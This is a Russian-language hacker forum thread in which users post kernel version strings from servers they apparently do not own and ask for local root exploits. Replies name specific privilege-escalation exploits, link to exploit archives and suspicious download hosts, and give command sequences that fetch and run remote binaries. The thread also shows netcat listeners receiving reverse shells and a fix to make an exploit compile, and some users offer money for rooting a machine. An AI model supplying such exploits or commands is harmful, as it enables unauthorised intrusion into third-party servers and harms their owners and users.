Просмотр полной версии : повышение прав [задай вопрос - получи ответ]
есть скомпилированный сплоит для xp sp2 ?
есть скомпилированный сплоит для xp sp2 ?
metasploit???? нет?
C:\nc>nc.exe -l -v -n -p 5555
listening on [any] 5555 ...
connect to [1ip] from (UNKNOWN) [2ip] 49183
C:\nc>nc.exe -l -v -n -p 11457
listening on [any] 11457 ...
connect to [1ip] from (UNKNOWN) [2ip] 43520
C:\nc>nc.exe -l -v -n -p 11457
listening on [any] 11457 ...
connect to [1ip] from (UNKNOWN) [2ip] 43521
C:\nc>nc.exe -l -v -n -p 4646
listening on [any] 4646 ...
connect to [1ip] from (UNKNOWN) [2ip] 41248
C:\nc>
И че блин делать?
попробуй бинд
nc.exe xxx.xxx.xxx.xxx 13337
Linux 2.6.23.17-88.fc7 #1 SMP Thu May 15 00:35:10 EDT 2008 i686 i686 i386 GNU/Linux
стукните плиз у кого есть!
может это
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953
Expl0ited
19.04.2011, 18:09
я думаю чтобы не было споров надо почитать:
http://www.freebsd.org/doc/ru_RU.KOI8-R/articles/explaining-bsd/compairing-bsd-and-linux.html
А причем здесь отличия систем, и то как можно закрепится?
А причем здесь отличия систем, и то как можно закрепится?
сори не до конца понял тему
inux ds210.reliablehosting.com 2.6.18-164.11.1.el5PAE #1 SMP Wed Jan 20 08:16:13 EST 2010 i686
Вот под это что нибудь есть ?
Заранее благодарен.
а есть чтонибудь на
Linux сайт 2.6.26-2-amd64 #1 SMP Tue Jan 12 22:12:20 UTC 2010 x86_64
Linux 2.6.26-2-xen-amd64 #1 SMP Wed Mar 10 00:29:48 UTC 2010 x86_64 GNU/Linux
robert_you_suck.c \ full_nelson.c \ sendpage3 не сработали... Будут предложения?
Linux 2.6.26-2-xen-amd64 #1 SMP Wed Mar 10 00:29:48 UTC 2010 x86_64 GNU/Linux
robert_you_suck.c \ full_nelson.c не сработали... Будут предложения?
sendpage3
sendpage3
Пробовал, не сработал, забыл указать просто...
A_n_d_r_e_i
27.04.2011, 22:27
Linux 2.6.18-194.32.1.el5 #1 SMP Wed Jan 5 17:53:09 EST 2011 i686
Есть что под это?
какой сплоит использовать??
uname -a: Linux server.webmph.com 2.6.18-028stab068.3-ent #1 SMP Wed Feb 17 11:54:49 MSK 2010 i686
Нужен сплойт для рута FreeBSD 8.2, если у кого есть - поделитесь плз!
Нужен сплойт для рута FreeBSD 8.2, если у кого есть - поделитесь плз!
Эти не помогут:
http://packetstormsecurity.org/search/files/?q=freebsd%20root%20exploit
http://www.hackerzlair.org/members/blank/pROcon/information.htm
eshe na eti est chto????
uname -a: Linux 2.6.18-194.17.1.el5 #1 SMP Wed Sep 29 12:50:31 EDT 2010
uname -a: Linux 2.6.18-028stab068.3-ent #1 SMP Wed Feb 17 11:54:49 MSK 2010 i686
Linux n16 2.6.33.1mtv4 #1 SMP Fri Apr 8 10:06:50 PDT 2011 i686
Linux *** 2.6.18-194.17.1.el5 #1 SMP Wed Sep 29 12:50:31 EDT 2010 x86_64
Linux *** 2.6.18-238.9.1.el5xen #1 SMP Tue Apr 12 19:32:47 EDT 2011 i686
Под это есть что нибуть?
Darwin Kernel Version 9.8.0: Wed Jul 15 16:55:01 PDT 2009; root:xnu-1228.15.4~1/RELEASE_I386 i386
Linux inventory 2.6.24-28-virtual #1 SMP Wed Nov 24 10:38:58 UTC 2010 i686
2.6.18-194.32.1.el5PAE #1 SMP Wed Jan 5 18:43:13 EST 2011 i686
Знаю что вышел локал рут (версия 2011 года), но не могу найти - если есть у кого то то помогите плз! Если есть у кого то акк тут _http://www.dl4hack.com/forum/local-root-exploits/1349-2-6-18-2011-root-exploit.html выложите плз сплойт
Cybersteger
05.05.2011, 20:24
2.6.18-194.32.1.el5PAE #1 SMP Wed Jan 5 18:43:13 EST 2011 i686
Знаю что вышел локал рут (версия 2011 года), но не могу найти - если есть у кого то то помогите плз! Если есть у кого то акк тут _http://www.dl4hack.com/forum/local-root-exploits/1349-2-6-18-2011-root-exploit.html выложите плз сплойт
мне кажется что этот(http://www.dl4hack.com/forum/local-root-exploits/1349-2-6-18-2011-root-exploit.html) сплойт vmsplice под 2008 (
http://security-tr.blogspot.com/2011/01/2618-2011-local-root-exploit.html)
можешь попробовать
https: / /rdot.org/forum/showthread.php?t=817 под Glibc
Вообщем не очень понимаю в кодинге НО я тут прочитал
в журнале XАкере февраль 2011 есть "Обход ограничений БЕЗОПАСТНОСТИ в ядре LINUX и в ( обход защиты выделения памяти ниже значения ,установленного в mmap_min_addr. уязвимость "Разыменование нулевого указателя")
кто нибудь сможет пояснить что нужно исправить в сплоите 2010 ( так понял что там (изменение адреса памяти, этой ветки. а можно ли на другую ветку изменить адрес . mmap )
ReV0LVeR
08.05.2011, 07:14
OS: Linux u-host.ru 2.6.9-100.ELsmp
Server security information
Server software:Apache/2.0.52(Red Hat)
Loaded Apache modules:core,prefork,http_core,mod _so,mod_access,mod_auth,mod_auth_anon,mod_auth_dig est,mod_include,mod_log_config,mod_env,mod_expires ,mod_deflate,mod_headers,mod_usertrack,mod_setenvi f,mod_mime,mod_dav,mod_status,mod_autoindex,mod_in fo,mod_dav_fs,mod_vhost_alias,mod_negotiation,mod_ dir,mod_actions,mod_userdir,mod_alias,mod_rewrite, mod_cache,mod_suexec,mod_disk_cache,mod_file_cache ,mod_mem_cache,mod_cgi,mod_fpcgid,mod_jk,mod_bw,mo d_fcgid,mod_perl,mod_php5,mod_ssl
Disabled PHP Functions:ini_restore
Open base dir: /var/virtual/www/
cURL support:enabled
Supported databases:MySql(4.1.22),PostgreSQL
Спасибо
OS: Linux u-host.ru 2.6.9-100.ELsmp
Server security information
Server software:Apache/2.0.52(Red Hat)
Loaded Apache modules:core,prefork,http_core,mod _so,mod_access,mod_auth,mod_auth_anon,mod_auth_dig est,mod_include,mod_log_config,mod_env,mod_expires ,mod_deflate,mod_headers,mod_usertrack,mod_setenvi f,mod_mime,mod_dav,mod_status,mod_autoindex,mod_in fo,mod_dav_fs,mod_vhost_alias,mod_negotiation,mod_ dir,mod_actions,mod_userdir,mod_alias,mod_rewrite, mod_cache,mod_suexec,mod_disk_cache,mod_file_cache ,mod_mem_cache,mod_cgi,mod_fpcgid,mod_jk,mod_bw,mo d_fcgid,mod_perl,mod_php5,mod_ssl
Disabled PHP Functions:ini_restore
Open base dir: /var/virtual/www/
cURL support:enabled
Supported databases:MySql(4.1.22),PostgreSQL
Спасибо
для Linux 2.6.9 вот:
1. wget http://www.grsecurity.net/~spender/enlightenment.tgz
2. tar -zxf enlightenment.tgz
3. cd enlightenment
4. ./run_null_exploits
5. ???
6. PROFIT!!!
Linux version 2.6.24-1gb-1 ?
Linux version 2.6.24-1gb-1 ?
Кидайте вы полный uname -a, без даты сборки ядра нет смысла постить 100500 плоентов.
Linux version 2.6.24-1gb-1 (root@l4.in-so[TR@$H]lve.ru) (gcc version 4.1.2 (Gentoo 4.1.2 p1.0.2)) #4 SMP Fri Feb 29 20:10:01 MSK 2008
Пробуй sock_sendpage 3: http://www.exploit-db.com/exploits/9641/
full_neslon
Так же есть посмотри в сторону Glibc.
что посоветуете на:
2.4.21-57.ELsmp #1 SMP Wed Apr 23 01:38:02 EDT 2008 i686 ?
Linux *** 2.6.18-238.1.1.1.el5 #1 SMP Mon Jan 24 10:43:48 NOVT 2011 x86_64
???
Linux *** 2.6.18-238.1.1.1.el5 #1 SMP Mon Jan 24 10:43:48 NOVT 2011 x86_64
???
Дата сборки ядра 2011 год, 99.99% что не порутаешь.
2.6.35.4-grsec-hostnoc-4.3.0-x86_64-libata #1 SMP Mon Sep 20 19:13:02 EDT 2010 x86_64
есть что-нибудь ?
Дата сборки ядра 2011 год, 99.99% что не порутаешь.
Я не порутаю или вообще никто?
Я не порутаю или вообще никто?
Приватные сплоиты может и есть, в паблике 2011 нету.
Пересборка ядра в 99.99% озночает фикс предыдущих уязвимостей.
Linux xx.ru 2.6.18-028stab056-aufs-teak21 #11 SMP Wed Mar 10 18:10:04 MSK 2010 i686
есть что нибудь?
Linux xx.ru 2.6.18-028stab056-aufs-teak21 #11 SMP Wed Mar 10 18:10:04 MSK 2010 i686
есть что нибудь?
попробуй http://www.opennet.ru/opennews/art.shtml?num=28338
IMMORTAL_S
14.05.2011, 22:08
Linux 2.6.18-164.2.1.el5.028stab066.10 #1 SMP Sat Dec 12 18:52:53 MSK 2009 x86_64 GNU/Linux
Что-то не получилось этим http://www.1337day.com/exploits/14333
А в этом http://www.1337day.com/exploits/15065 нужно что-то подправить, но я не шарю *r34d th3 c0d3 m0r0n!
Help
add:
http://www.1337day.com/exploits/8208
Вот этот выдает ошибку
In function 'main':
error: 'PAGE_SIZE' undeclared (firs use in this function)
error: (Each undeclared identifier is reported only once for each function it appears in.)
Просто си для меня что-то невообразимое)) ..помогите
IMMORTAL_S
15.05.2011, 17:01
#include
Это есть... ругается вот на это:
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
Проблема решена.. добавил #define PAGE_SIZE getpagesize()
Жаль сплойт не сработал
Такой подскажите чем рутать?
2.6.18-194.17.1.el5 #1 SMP Wed Sep 29 12:50:31 EDT 2010 x86_64
А сплоит kernel-2.6.18.194 */*e15 */* 2010 Local Root Exploit - тлоько под x64 что ли?
Как на счёт этого - Linux *** 2.6.18-194.8.1.el5.028stab070.4 #1 SMP Tue Aug 17 19:11:52 MSD 2010 x86_64 ???
FreeBSD 4.10-RELEASE-p14 #0: Sa i386
Стесняюсь спросить
Linux inventory 2.6.32-31-generic-pae #61-Ubuntu SMP Fri Apr 8 20:00:13 UTC 2011 i686
wtarantul
20.05.2011, 02:40
Уважаемые. С этим получится, что сделать ?
Linux 2.6.9-89.0.25.ELsmp #1 SMP Thu May 6 12:28:03 EDT 2010 i686
Уважаемые. С этим получится, что сделать ?
Linux 2.6.9-89.0.25.ELsmp #1 SMP Thu May 6 12:28:03 EDT 2010 i686
попробуй эти:
http://pastebin.com/tPF2w9VT
http://www.qurizhao.com/Article/HTML/20100901140434.html
2.6.18-194.11.4.el5 #1 SMP Tue Sep 21 05:04:09 EDT 2010 x86_64
Реально рутануть?
А что, собственно, означают эти цифры? 194.11.4.el5
Linux www 2.6.34-gentoo-r12 #1 SMP Sun Oct 24 04:38:49 YEKST 2010 x86_64
есть что нибудь?
Парни кто может рутать за денежку или на взаимовыгодных условиях, стукните плз в ПМ мне. Желательно человек с хорошим набором сплойтов и с приватом.
Linux www 2.6.34-gentoo-r12 #1 SMP Sun Oct 24 04:38:49 YEKST 2010 x86_64
есть что нибудь?
http://www.securitylab.ru/poc/extra/403996.php
правда на х86
http://www.exploit-db.com/exploits/12130/
еще можно full-nelson попробовать
Linux 2.6.35.8-nx #1 SMP Wed Nov 3 01:47:21 EDT 2010 i686
Linux 2.6.18-92.1.22.el5PAE #1 SMP Tue Dec 16 12:36:25 EST 2008 i686
enlightenment не взял
2.6.18-194.26.1.el5PAE #1 SMP Tue Nov 9 13:34:42 EST 2010 i686 i686 i386 GNU/Linux подскажите каким сплоитом поднять права
2.6.18-194.26.1.el5PAE #1 SMP Tue Nov 9 13:34:42 EST 2010 i686 i686 i386 GNU/Linux подскажите каким сплоитом поднять права
Никаким...это ядро рутается только на x64 системе...
antiaudomain
03.06.2011, 16:43
2.6.21.7-2.fc8xen #1 SMP Fri Feb 15 12:39:36 EST 2008 i686
подскажете чего?
antiaudomain
03.06.2011, 20:49
телки!
не катит чего-то, к сожалению =\
Cennarios
06.06.2011, 16:30
Если не затруднит, пожалуйста под вот это дело что посоветуете:
Linux ps29317 2.6.33.7-vs2.3.0.36.30.4 x86_64
Если не затруднит, пожалуйста под вот это дело что посоветуете:
Linux ps29317 2.6.33.7-vs2.3.0.36.30.4 x86_64
id пож. дата:
Если не затруднит, пожалуйста под вот это дело что посоветуете:
Linux ps29317 2.6.33.7-vs2.3.0.36.30.4 x86_64
Если старая ветка то попробуй:
http://www.exploit-db.com/exploits/12130/
http://forum.xaknet.ru/showthread.php?t=19237
http://seclists.org/fulldisclosure/2009/Nov/105
uname -a:
Linux 2.6.35.11-83.9.amzn1.i686 #1 SMP Sat Feb 19 23:41:56 UTC 2011 i686
посоветуйте пожалуйста, что можно использовать для повышения прав. Плзб если можно, линки на сплойты
Заранее благодарен
TARANTYL
08.06.2011, 01:13
Ребята, будьте любезны помогите под это сокровище что-нибудь найти:
FreeBSD 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Tue Dec 8 10:36:29 IRKT 2009 root@freebsd8-amd64.
winstrool
08.06.2011, 01:26
помогите подобрать сплоит вод под это:
Linux web-server 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686
пробывал следущие сплоиты, не помогают:
2.6.18-128
2.6.18-128-private
2.6.18.194-kompilayr
это те что фигурировали постом выше...
Ребята, будьте любезны помогите под это сокровище что-нибудь найти:
FreeBSD 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Tue Dec 8 10:36:29 IRKT 2009 root@freebsd8-amd64.
Этот точно пробьёт:
http://www.1337day.com/exploits/14374
помогите подобрать сплоит вод под это:
пробывал следущие сплоиты, не помогают:
это те что фигурировали постом выше...
http://e-moneybook.com/ioncube/file/hack/kernel/2.6.18-2007
Если не возьмёт то попробуй этот:
http://e-moneybook.com/ioncube/file/hack/kernel/2.6.18-2008
uname -a:
Linux 2.6.35.11-83.9.amzn1.i686 #1 SMP Sat Feb 19 23:41:56 UTC 2011 i686
посоветуйте пожалуйста, что можно использовать для повышения прав. Плзб если можно, линки на сплойты
Заранее благодарен
ничего...для 2011 года в паблике нету сплойтов.
uname -a:
Linux 2.6.35.11-83.9.amzn1.i686 #1 SMP Sat Feb 19 23:41:56 UTC 2011 i686
посоветуйте пожалуйста, что можно использовать для повышения прав. Плзб если можно, линки на сплойты
Заранее благодарен
Готов заплатить 100$ за предоставление root на этой машине.
ЗЫ "пробовать" не дам - надо конкретно - или да или нет. Есть 1 попытка! Далее все прикроют. Поэтому доверюсь только профи.
Все предложения строго в личку!!!
Linux 2.6.18.8.xs5.5.0.13.442 #1 SMP Fri May 29 10:26:39 UTC 2009 i686
Что посоветуете?
Linux 2.6.18.8.xs5.5.0.13.442 #1 SMP Fri May 29 10:26:39 UTC 2009 i686
Что посоветуете?
Этот должен подойти:
http://turboupload.com/hdjt80txiaxm
Linux 2.6.21.7-2.fc8xen
Какие идеи?
Какие идеи?
выше ссылка
это autorooter
uname -a: Linux p13.alfaservers.com 2.6.9-89.0.20.ELsmp #1
кто может подсказать ?
beerbear
13.06.2011, 01:09
Linux univox 2.6.32.8-grsec-2.1.14-modsign-xeon-64 #2 SMP Sat Mar 13 00:42:43 PST 2010 x86_64
посоветуйте, плз, че-нить под это
выше ссылка
это autorooter
А сам пробовал этот авторутер? Так такой наборчик, что машина скорее упадет, чем порутается.
А сам пробовал этот авторутер? Так такой наборчик, что машина скорее упадет, чем порутается.
и не один рутал
Какие идеи?
wget http://trav1an.t35.com/Localz/Localz-4
chmod +x Localz-4
./Localz-4
Linux univox 2.6.32.8-grsec-2.1.14-modsign-xeon-64 #2 SMP Sat Mar 13 00:42:43 PST 2010 x86_64
посоветуйте, плз, че-нить под это
http://www.exploit-db.com/exploits/15023/
Если не возьмёт, покажи вывод команды:
ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;
beerbear
13.06.2011, 14:52
http://www.exploit-db.com/exploits/15023/
пробовал его
не робит
Если не возьмёт, покажи вывод команды:
ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;
в личке
antiaudomain
14.06.2011, 17:59
Есть у кого скомпиленный babcia padlina под FreeBSD 6.1 2006 ? не компилится ни в какую у меня.. заранее благодарен
Linux 2.6.18-028stab077.1-ent #1 SMP Mon Nov 1 19:40:39 MSK 2010 i686
есть какие-нибудь варианты?
SpaceMan
14.06.2011, 22:26
ищу сплоит под Linux Kernel 2.6.9
Linux 2.6.18-028stab077.1-ent #1 SMP Mon Nov 1 19:40:39 MSK 2010 i686
есть какие-нибудь варианты?
нету
ищу сплоит под Linux Kernel 2.6.9
wget http://www.schoolbd.com/adsense/cc/2.6.9-55-2007-prv8
chmod +x 2.6.9-55-2007-prv8
./2.6.9-55-2007-prv8
SpaceMan
15.06.2011, 07:58
wget http://www.schoolbd.com/adsense/cc/2.6.9-55-2007-prv8
chmod +x 2.6.9-55-2007-prv8
./2.6.9-55-2007-prv8
неполучаеться (
http://s001.radikal.ru/i193/1106/80/87a1a863cddf.jpg
неполучаеться (
http://s001.radikal.ru/i193/1106/80/87a1a863cddf.jpg
ты пытаешься скачать файл в папку в которой у тебя нету прав на запись...используй переводчик, если не знаешь англ.
SpaceMan
cd /tmp
wget http://www.schoolbd.com/adsense/cc/2.6.9-55-2007-prv8
chmod +x 2.6.9-55-2007-prv8
./2.6.9-55-2007-prv8
Есть что нибудь под это?
5.1.37-1ubuntu5.5 работает на debian-lunux-gnu
Expl0ited
22.06.2011, 12:14
uname -a кинь
2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:54:20 EDT 2006 i686
Есть что-нибудь под это?
winstrool
23.06.2011, 03:52
попробуй вот из этого:
2.6.18-*
скомпелированый _http://zalil.ru/31319111
исходники _http://zalil.ru/31319116
2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:54:20 EDT 2006 i686
Есть что-нибудь под это?
wget http://www.interiordelduque.com/userfiles/image/2.6.18
chmod +x 2.6.18
./2.6.18
Linux hosting 2.6.26-1-686 #1 SMP Fri Mar 13 18:08:45 UTC 2009 i686
Под это есть что-то?
wget http://www.schoolbd.com/adsense/cc/2.6.9-55-2007-prv8
chmod +x 2.6.9-55-2007-prv8
./2.6.9-55-2007-prv8
sh: ./2.6.9-55-2007-prv8: cannot execute binary file
Мне бы 2.6.9-89.0.23.EL #1 Wed Mar 17 06:22:05 EDT 2010 i686 пробить.
Linux hosting 2.6.26-1-686 #1 SMP Fri Mar 13 18:08:45 UTC 2009 i686
Под это есть что-то?
ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;
ответ сервера покажи
sh: ./2.6.9-55-2007-prv8: cannot execute binary file
Мне бы 2.6.9-89.0.23.EL #1 Wed Mar 17 06:22:05 EDT 2010 i686 пробить.
ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;
ответ сервера покажи
$ ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;
total 26948
3637249 drwxr-xr-x 3 root root 4096 Apr 8 2009 .
2 drwxr-xr-x 24 root root 4096 Apr 8 2009 ..
3637250 -rw-r--r-- 1 root root 723178 Feb 11 2008 System.map-2.6.18-6-686
3637268 -rw-r--r-- 1 root root 928033 Mar 14 2009 System.map-2.6.26-1-686
3637251 -rw-r--r-- 1 root root 70682 Feb 11 2008 config-2.6.18-6-686
3637269 -rw-r--r-- 1 root root 91640 Mar 14 2009 config-2.6.26-1-686
3637254 drwxr-xr-x 2 root root 4096 Apr 8 2009 grub
3637267 -rw-r--r-- 1 root root 5259149 Apr 8 2009 initrd.img-2.6.18-6-686
3637266 -rw-r--r-- 1 root root 5259970 Apr 8 2009 initrd.img-2.6.18-6-686.bak
3637272 -rw-r--r-- 1 root root 6194894 Apr 8 2009 initrd.img-2.6.26-1-686
3637270 -rw-r--r-- 1 root root 6194909 Apr 8 2009 initrd.img-2.6.26-1-686.bak
3637252 -rw-r--r-- 1 root root 1260861 Feb 11 2008 vmlinuz-2.6.18-6-686
3637253 -rw-r--r-- 1 root root 1506512 Mar 14 2009 vmlinuz-2.6.26-1-686
12697846 -rw-r--r-- 1 root root 5440 Jan 4 2009 /lib/libpcprofile.so
12697768 -rwxr-xr-x 1 root root 113248 Jan 4 2009 /lib/ld-2.7.so
12697649 lrwxrwxrwx 1 root root 9 Apr 8 2009 /lib/ld-linux.so.2 -> ld-2.7.so
ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;
ответ сервера покажи
total 55852
2 drwxr-xr-x 4 root root 8192 Mar 3 06:11 .
2 drwxr-xr-x 27 root root 4096 Jun 8 01:19 ..
6036 -rw-r--r-- 1 root root 770652 Feb 18 08:41 System.map-2.6.9-100.EL
14 -rw-r--r-- 1 root root 749462 Aug 12 2006 System.map-2.6.9-42.EL
18 -rw-r--r-- 1 root root 754505 Jun 26 2007 System.map-2.6.9-55.0.2.EL
6031 -rw-r--r-- 1 root root 754717 Sep 28 2007 System.map-2.6.9-55.0.9.EL
10042 -rw-r--r-- 1 root root 759989 Dec 19 2007 System.map-2.6.9-67.0.1.EL
10062 -rw-r--r-- 1 root root 760559 Jul 24 2008 System.map-2.6.9-67.0.22.EL
10047 -rw-r--r-- 1 root root 759989 Feb 3 2008 System.map-2.6.9-67.0.4.EL
10087 -rw-r--r-- 1 root root 780664 May 1 2009 System.map-2.6.9-78.0.22.EL
10077 -rw-r--r-- 1 root root 780400 Nov 20 2008 System.map-2.6.9-78.0.8.EL
2009 -rw-r--r-- 1 root root 768660 Nov 4 2009 System.map-2.6.9-89.0.16.EL
2019 -rw-r--r-- 1 root root 768688 Jan 8 2010 System.map-2.6.9-89.0.19.EL
2029 -rw-r--r-- 1 root root 768822 Mar 17 2010 System.map-2.6.9-89.0.23.EL
2034 -rw-r--r-- 1 root root 768853 May 6 2010 System.map-2.6.9-89.0.25.EL
2039 -rw-r--r-- 1 root root 768881 Aug 20 2010 System.map-2.6.9-89.0.28.EL
10097 -rw-r--r-- 1 root root 768504 Aug 24 2009 System.map-2.6.9-89.0.9.EL
2049 -rw-r--r-- 1 root root 768881 Sep 28 2010 System.map-2.6.9-89.29.1.EL
2054 -rw-r--r-- 1 root root 769059 Oct 20 2010 System.map-2.6.9-89.31.1.EL
2059 -rw-r--r-- 1 root root 769059 Dec 2 2010 System.map-2.6.9-89.33.1.EL
6027 -rw-r--r-- 1 root root 769061 Jan 19 01:06 System.map-2.6.9-89.35.1.EL
6025 -rwxr--r-- 1 root root 6144 Jul 30 2007 aquota.user
6037 -rw-r--r-- 1 root root 51676 Feb 18 08:41 config-2.6.9-100.EL
15 -rw-r--r-- 1 root root 50333 Aug 12 2006 config-2.6.9-42.EL
19 -rw-r--r-- 1 root root 50432 Jun 26 2007 config-2.6.9-55.0.2.EL
6032 -rw-r--r-- 1 root root 50432 Sep 28 2007 config-2.6.9-55.0.9.EL
10043 -rw-r--r-- 1 root root 50924 Dec 19 2007 config-2.6.9-67.0.1.EL
10063 -rw-r--r-- 1 root root 50925 Jul 24 2008 config-2.6.9-67.0.22.EL
10048 -rw-r--r-- 1 root root 50924 Feb 3 2008 config-2.6.9-67.0.4.EL
10088 -rw-r--r-- 1 root root 51502 May 1 2009 config-2.6.9-78.0.22.EL
10078 -rw-r--r-- 1 root root 51501 Nov 20 2008 config-2.6.9-78.0.8.EL
2010 -rw-r--r-- 1 root root 51614 Nov 4 2009 config-2.6.9-89.0.16.EL
2020 -rw-r--r-- 1 root root 51614 Jan 8 2010 config-2.6.9-89.0.19.EL
2030 -rw-r--r-- 1 root root 51614 Mar 17 2010 config-2.6.9-89.0.23.EL
2035 -rw-r--r-- 1 root root 51645 May 6 2010 config-2.6.9-89.0.25.EL
2040 -rw-r--r-- 1 root root 51645 Aug 20 2010 config-2.6.9-89.0.28.EL
18073 -rw-r--r-- 1 root root 51613 Aug 24 2009 config-2.6.9-89.0.9.EL
2050 -rw-r--r-- 1 root root 51645 Sep 28 2010 config-2.6.9-89.29.1.EL
2055 -rw-r--r-- 1 root root 51645 Oct 20 2010 config-2.6.9-89.31.1.EL
2060 -rw-r--r-- 1 root root 51645 Dec 2 2010 config-2.6.9-89.33.1.EL
6028 -rw-r--r-- 1 root root 51645 Jan 19 01:06 config-2.6.9-89.35.1.EL
12049 drwxr-xr-x 2 root root 1024 Mar 3 06:11 grub
6040 -rw-r--r-- 1 root root 593873 Mar 3 06:11 initrd-2.6.9-100.EL.img
17 -rw-r--r-- 1 root root 399475 Jul 28 2007 initrd-2.6.9-42.EL.img
21 -rw-r--r-- 1 root root 588215 Jul 28 2007 initrd-2.6.9-55.0.2.EL.img
6034 -rw-r--r-- 1 root root 588204 Sep 29 2007 initrd-2.6.9-55.0.9.EL.img
10046 -rw-r--r-- 1 root root 592220 Dec 22 2007 initrd-2.6.9-67.0.1.EL.img
10066 -rw-r--r-- 1 root root 592219 Jul 25 2008 initrd-2.6.9-67.0.22.EL.img
10051 -rw-r--r-- 1 root root 592222 Feb 5 2008 initrd-2.6.9-67.0.4.EL.img
10091 -rw-r--r-- 1 root root 592902 Jun 8 2009 initrd-2.6.9-78.0.22.EL.img
10081 -rw-r--r-- 1 root root 592859 Nov 21 2008 initrd-2.6.9-78.0.8.EL.img
2013 -rw-r--r-- 1 root root 593352 Nov 5 2009 initrd-2.6.9-89.0.16.EL.img
2023 -rw-r--r-- 1 root root 593344 Jan 10 2010 initrd-2.6.9-89.0.19.EL.img
2033 -rw-r--r-- 1 root root 593542 Mar 21 2010 initrd-2.6.9-89.0.23.EL.img
2038 -rw-r--r-- 1 root root 593530 May 9 2010 initrd-2.6.9-89.0.25.EL.img
2043 -rw-r--r-- 1 root root 593592 Aug 24 2010 initrd-2.6.9-89.0.28.EL.img
18076 -rw-r--r-- 1 root root 593358 Aug 26 2009 initrd-2.6.9-89.0.9.EL.img
2053 -rw-r--r-- 1 root root 593576 Sep 30 2010 initrd-2.6.9-89.29.1.EL.img
2058 -rw-r--r-- 1 root root 593565 Oct 21 2010 initrd-2.6.9-89.31.1.EL.img
2063 -rw-r--r-- 1 root root 593569 Jan 12 05:52 initrd-2.6.9-89.33.1.EL.img
6035 -rw-r--r-- 1 root root 593570 Jan 21 05:36 initrd-2.6.9-89.35.1.EL.img
11 drwx------ 2 root root 12288 Jul 28 2007 lost+found
12 -rw-r--r-- 1 root root 9371 Aug 13 2006 message
13 -rw-r--r-- 1 root root 9371 Aug 13 2006 message.ja
6026 -rwxr--r-- 1 root root 32 Jul 30 2007 quota.user
6038 -rw-r--r-- 1 root root 67797 Feb 18 08:41 symvers-2.6.9-100.EL.gz
10044 -rw-r--r-- 1 root root 64308 Dec 19 2007 symvers-2.6.9-67.0.1.EL.gz
10064 -rw-r--r-- 1 root root 64329 Jul 24 2008 symvers-2.6.9-67.0.22.EL.gz
10049 -rw-r--r-- 1 root root 64308 Feb 3 2008 symvers-2.6.9-67.0.4.EL.gz
10089 -rw-r--r-- 1 root root 66266 May 1 2009 symvers-2.6.9-78.0.22.EL.gz
10079 -rw-r--r-- 1 root root 66235 Nov 20 2008 symvers-2.6.9-78.0.8.EL.gz
2011 -rw-r--r-- 1 root root 67596 Nov 4 2009 symvers-2.6.9-89.0.16.EL.gz
2021 -rw-r--r-- 1 root root 67596 Jan 8 2010 symvers-2.6.9-89.0.19.EL.gz
2031 -rw-r--r-- 1 root root 67606 Mar 17 2010 symvers-2.6.9-89.0.23.EL.gz
2036 -rw-r--r-- 1 root root 67650 May 6 2010 symvers-2.6.9-89.0.25.EL.gz
2041 -rw-r--r-- 1 root root 67650 Aug 20 2010 symvers-2.6.9-89.0.28.EL.gz
18074 -rw-r--r-- 1 root root 67596 Aug 24 2009 symvers-2.6.9-89.0.9.EL.gz
2051 -rw-r--r-- 1 root root 67650 Sep 28 2010 symvers-2.6.9-89.29.1.EL.gz
2056 -rw-r--r-- 1 root root 67667 Oct 20 2010 symvers-2.6.9-89.31.1.EL.gz
2061 -rw-r--r-- 1 root root 67701 Dec 2 2010 symvers-2.6.9-89.33.1.EL.gz
6029 -rw-r--r-- 1 root root 67701 Jan 19 01:07 symvers-2.6.9-89.35.1.EL.gz
6039 -rw-r--r-- 1 root root 1538264 Feb 18 08:41 vmlinuz-2.6.9-100.EL
16 -rw-r--r-- 1 root root 1504101 Aug 12 2006 vmlinuz-2.6.9-42.EL
20 -rw-r--r-- 1 root root 1511833 Jun 26 2007 vmlinuz-2.6.9-55.0.2.EL
6033 -rw-r--r-- 1 root root 1511602 Sep 28 2007 vmlinuz-2.6.9-55.0.9.EL
10045 -rw-r--r-- 1 root root 1518785 Dec 19 2007 vmlinuz-2.6.9-67.0.1.EL
10065 -rw-r--r-- 1 root root 1519323 Jul 24 2008 vmlinuz-2.6.9-67.0.22.EL
10050 -rw-r--r-- 1 root root 1518757 Feb 3 2008 vmlinuz-2.6.9-67.0.4.EL
10090 -rw-r--r-- 1 root root 1545940 May 1 2009 vmlinuz-2.6.9-78.0.22.EL
10080 -rw-r--r-- 1 root root 1545983 Nov 20 2008 vmlinuz-2.6.9-78.0.8.EL
2012 -rw-r--r-- 1 root root 1536244 Nov 4 2009 vmlinuz-2.6.9-89.0.16.EL
2022 -rw-r--r-- 1 root root 1536247 Jan 8 2010 vmlinuz-2.6.9-89.0.19.EL
2032 -rw-r--r-- 1 root root 1536228 Mar 17 2010 vmlinuz-2.6.9-89.0.23.EL
2037 -rw-r--r-- 1 root root 1536380 May 6 2010 vmlinuz-2.6.9-89.0.25.EL
2042 -rw-r--r-- 1 root root 1536716 Aug 20 2010 vmlinuz-2.6.9-89.0.28.EL
18075 -rw-r--r-- 1 root root 1533159 Aug 24 2009 vmlinuz-2.6.9-89.0.9.EL
2052 -rw-r--r-- 1 root root 1536664 Sep 28 2010 vmlinuz-2.6.9-89.29.1.EL
2057 -rw-r--r-- 1 root root 1536908 Oct 20 2010 vmlinuz-2.6.9-89.31.1.EL
2062 -rw-r--r-- 1 root root 1536830 Dec 2 2010 vmlinuz-2.6.9-89.33.1.EL
6030 -rw-r--r-- 1 root root 1536995 Jan 19 01:06 vmlinuz-2.6.9-89.35.1.EL
